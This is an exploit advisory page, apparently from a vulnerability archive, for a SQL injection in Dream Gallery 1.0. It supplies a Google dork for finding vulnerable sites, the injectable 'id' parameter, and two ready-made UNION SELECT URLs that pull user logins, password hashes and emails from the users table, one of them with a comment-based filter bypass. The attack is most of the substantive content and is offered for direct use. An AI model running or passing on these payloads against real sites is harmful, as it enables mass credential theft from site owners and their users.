Dream Gallery 1.0 SQL Injection

2017.12.02
ir Zerones (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext: "Rafael Clares"

# Exploit Title: Dream Gallery 1.0 SQL Injection # Google Dork: intext: "Rafael Clares" # Date: 2017 / 12 / 01 # Exploit Author: Zerones # Vendor Homepage: N/A # Software Link: N/A # Version: 1.0 and to the top # Tested on: windows 8.1 - FireFox 57.0.1 # CVE : N/A http://target.com/bessa/galeria/album.php?id=[sqli] For Example: http://target.com/bessa/galeria/album.php?id=-14+union+select+1,group_concat(user_login,0x3a,user_password,0x3a,user_email),3,4,5,6,7,8,9+from+users Sometimes you will encounter an error that is a server error and requires a bypass like: http://target.com/bessa/galeria/album.php?id=-14+/*!50000union*/+select+1,unhex(hex(group_concat(user_login,0x3a,user_password,0x3a,user_email))),3,4,5,6,7,8,9+from+users


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top